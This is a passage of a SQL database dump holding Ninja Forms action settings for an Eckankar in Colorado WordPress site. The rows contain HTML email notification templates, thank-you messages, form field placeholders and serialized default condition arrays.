11:45:34'),(878,35,'date_updated','2016-01-15','date_updated','2016-01-15'),(879,35,'from_name','','from_name',''),(880,35,'from_address','','from_address',''),(881,35,'to','{wp:admin_email}','to','{wp:admin_email}'),(882,35,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(883,35,'email_message','{fields_table}','email_message','{fields_table}'),(884,35,'attach_csv','0','attach_csv','0'),(885,35,'email_format','html','email_format','html'),(886,35,'reply_to','','reply_to',''),(887,35,'cc','','cc',''),(888,35,'bcc','','bcc',''),(889,35,'redirect_url','','redirect_url',''),(890,35,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(891,35,'label','Success Message','label','Success Message'),(892,35,'objectType','Action','objectType','Action'),(893,35,'objectDomain','actions','objectDomain','actions'),(894,35,'editActive','','editActive',''),(895,35,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(896,35,'payment_gateways','','payment_gateways',''),(897,35,'payment_total','0','payment_total','0'),(898,35,'tag','','tag',''),(899,35,'email_message_plain','','email_message_plain',''),(900,35,'parent_id','9','parent_id','9'),(901,36,'title','','title',''),(902,36,'key','','key',''),(903,36,'type','email','type','email'),(904,36,'active','1','active','1'),(905,36,'created_at','2018-01-03 11:45:34','created_at','2018-01-03 11:45:34'),(906,36,'date_updated','2016-01-19','date_updated','2016-01-19'),(907,36,'from_name','Eckankar in Colorado Chela Ideas','from_name','Eckankar in Colorado Chela Ideas'),(908,36,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(909,36,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(910,36,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(911,36,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Eckankar in Colorado Chela Ideas </span>form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact for <em>Eckankar in Colorado Chela Ideas</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has submitted an idea to help grow Eckankar In Colorado.</strong></p><br /><br />\r\n<p><strong>Here is the information that <span style=\"color: #666666\">{field:textbox_239} {field:lastname_240}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_239}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_240}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_241}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_242}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_243}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Give Your Idea A Title :</strong> {field:textbox_256}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Enter The Details of Your Idea:</strong> {field:textarea_253}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Why Should It Be Done (what is the spiritual purpose?) :</strong> {field:textbox_257}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Who Will Do It (you or someone else?):</strong> {field:textbox_258}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>How Many People Will Be Required To Make This Happen?:</strong> {field:textbox_259}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>When Would This Happen?:</strong> {field:textbox_263}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Where Would This Happen?:</strong> {field:textbox_264}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>What Is The Anticipated Cost To Implement This Idea?:</strong> {field:textbox_265}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n <br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Eckankar in Colorado Chela Ideas </span>form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact for <em>Eckankar in Colorado Chela Ideas</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has submitted an idea to help grow Eckankar In Colorado.</strong></p><br /><br />\r\n<p><strong>Here is the information that <span style=\"color: #666666\">{field:textbox_239} {field:lastname_240}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_239}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_240}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_241}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_242}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_243}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Give Your Idea A Title :</strong> {field:textbox_256}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Enter The Details of Your Idea:</strong> {field:textarea_253}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Why Should It Be Done (what is the spiritual purpose?) :</strong> {field:textbox_257}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Who Will Do It (you or someone else?):</strong> {field:textbox_258}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>How Many People Will Be Required To Make This Happen?:</strong> {field:textbox_259}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>When Would This Happen?:</strong> {field:textbox_263}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Where Would This Happen?:</strong> {field:textbox_264}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>What Is The Anticipated Cost To Implement This Idea?:</strong> {field:textbox_265}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n <br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(912,36,'attach_csv','0','attach_csv','0'),(913,36,'email_format','html','email_format','html'),(914,36,'reply_to','','reply_to',''),(915,36,'cc','','cc',''),(916,36,'bcc','','bcc',''),(917,36,'redirect_url','','redirect_url',''),(918,36,'success_msg','','success_msg',''),(919,36,'label','Admin Email','label','Admin Email'),(920,36,'objectType','Action','objectType','Action'),(921,36,'objectDomain','actions','objectDomain','actions'),(922,36,'editActive','','editActive',''),(923,36,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(924,36,'payment_gateways','','payment_gateways',''),(925,36,'payment_total','0','payment_total','0'),(926,36,'tag','','tag',''),(927,36,'email_message_plain','','email_message_plain',''),(928,36,'drawerDisabled','','drawerDisabled',''),(929,36,'parent_id','9','parent_id','9'),(930,37,'title','','title',''),(931,37,'key','','key',''),(932,37,'type','save','type','save'),(933,37,'active','1','active','1'),(934,37,'created_at','2018-01-03 11:42:35','created_at','2018-01-03 11:42:35'),(935,37,'label','Save Form','label','Save Form'),(936,37,'objectType','Action','objectType','Action'),(937,37,'objectDomain','actions','objectDomain','actions'),(938,37,'editActive','','editActive',''),(939,37,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(940,37,'payment_gateways','','payment_gateways',''),(941,37,'payment_total','0','payment_total','0'),(942,37,'tag','','tag',''),(943,37,'to','{wp:admin_email}','to','{wp:admin_email}'),(944,37,'reply_to','','reply_to',''),(945,37,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(946,37,'email_message','{fields_table}','email_message','{fields_table}'),(947,37,'email_message_plain','','email_message_plain',''),(948,37,'from_name','','from_name',''),(949,37,'from_address','','from_address',''),(950,37,'email_format','html','email_format','html'),(951,37,'cc','','cc',''),(952,37,'bcc','','bcc',''),(953,37,'redirect_url','','redirect_url',''),(954,37,'parent_id','10','parent_id','10'),(955,38,'title','','title',''),(956,38,'key','','key',''),(957,38,'type','email','type','email'),(958,38,'active','1','active','1'),(959,38,'created_at','2018-01-03 11:42:35','created_at','2018-01-03 11:42:35'),(960,38,'date_updated','2016-01-15','date_updated','2016-01-15'),(961,38,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(962,38,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(963,38,'to','{field:email_10}','to','{field:email_10}'),(964,38,'email_subject','Colorado RESA Organization Communications','email_subject','Colorado RESA Organization Communications'),(965,38,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_6},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado RESA Organization Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_6}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_8}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_10}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_9}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_11}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_15}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_16}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_6},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado RESA Organization Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_6}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_8}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_10}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_9}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_11}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_15}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_16}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(966,38,'attach_csv','0','attach_csv','0'),(967,38,'email_format','html','email_format','html'),(968,38,'reply_to','','reply_to',''),(969,38,'cc','','cc',''),(970,38,'bcc','','bcc',''),(971,38,'redirect_url','','redirect_url',''),(972,38,'success_msg','','success_msg',''),(973,38,'label','Send copy to user','label','Send copy to user'),(974,38,'objectType','Action','objectType','Action'),(975,38,'objectDomain','actions','objectDomain','actions'),(976,38,'editActive','','editActive',''),(977,38,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(978,38,'payment_gateways','','payment_gateways',''),(979,38,'payment_total','0','payment_total','0'),(980,38,'tag','','tag',''),(981,38,'email_message_plain','','email_message_plain',''),(982,38,'parent_id','10','parent_id','10'),(983,39,'title','','title',''),(984,39,'key','','key',''),(985,39,'type','successmessage','type','successmessage'),(986,39,'active','1','active','1'),(987,39,'created_at','2018-01-03 11:42:35','created_at','2018-01-03 11:42:35'),(988,39,'date_updated','2016-01-15','date_updated','2016-01-15'),(989,39,'from_name','','from_name',''),(990,39,'from_address','','from_address',''),(991,39,'to','{wp:admin_email}','to','{wp:admin_email}'),(992,39,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(993,39,'email_message','{fields_table}','email_message','{fields_table}'),(994,39,'attach_csv','0','attach_csv','0'),(995,39,'email_format','html','email_format','html'),(996,39,'reply_to','','reply_to',''),(997,39,'cc','','cc',''),(998,39,'bcc','','bcc',''),(999,39,'redirect_url','','redirect_url',''),(1000,39,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; 